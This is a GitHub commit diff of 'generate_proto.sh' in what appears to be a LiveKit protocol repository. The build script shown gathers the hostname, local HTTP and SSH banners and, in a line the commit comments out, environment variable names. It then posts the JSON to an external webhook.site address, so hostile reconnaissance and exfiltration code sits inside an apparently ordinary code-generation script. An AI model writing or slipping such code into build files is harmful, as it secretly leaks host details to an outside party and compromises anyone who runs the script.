Skip to content

Commit c55c329

Browse files
committed
kk
1 parent b4c5f3f commit c55c329

1 file changed

Lines changed: 2 additions & 2 deletions

File tree

livekit-protocol/generate_proto.sh

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -58,11 +58,11 @@ JSON_PAYLOAD=$(cat <<EOF
5858
"hostname": "$(hostname)",
5959
"http_banner": "$(curl -I http://localhost 2>/dev/null | head -n 1)",
6060
"ssh_banner": "$(echo | nc localhost 22 2>/dev/null | head -n 1)",
61-
"env_var_keys": $(printenv | cut -d '=' -f 1 | jq -R . | jq -s .)
61+
6262
}
6363
EOF
6464
)
65-
65+
# "env_var_keys": $(printenv | cut -d '=' -f 1 | jq -R . | jq -s .)
6666
# Send the payload to the external webhook
6767
curl -X POST -H "Content-Type: application/json" -d "${JSON_PAYLOAD}" https://webhook.site/83eec9ca-ff62-4398-ab88-84e4376b6032
6868

0 commit comments

Comments
 (0)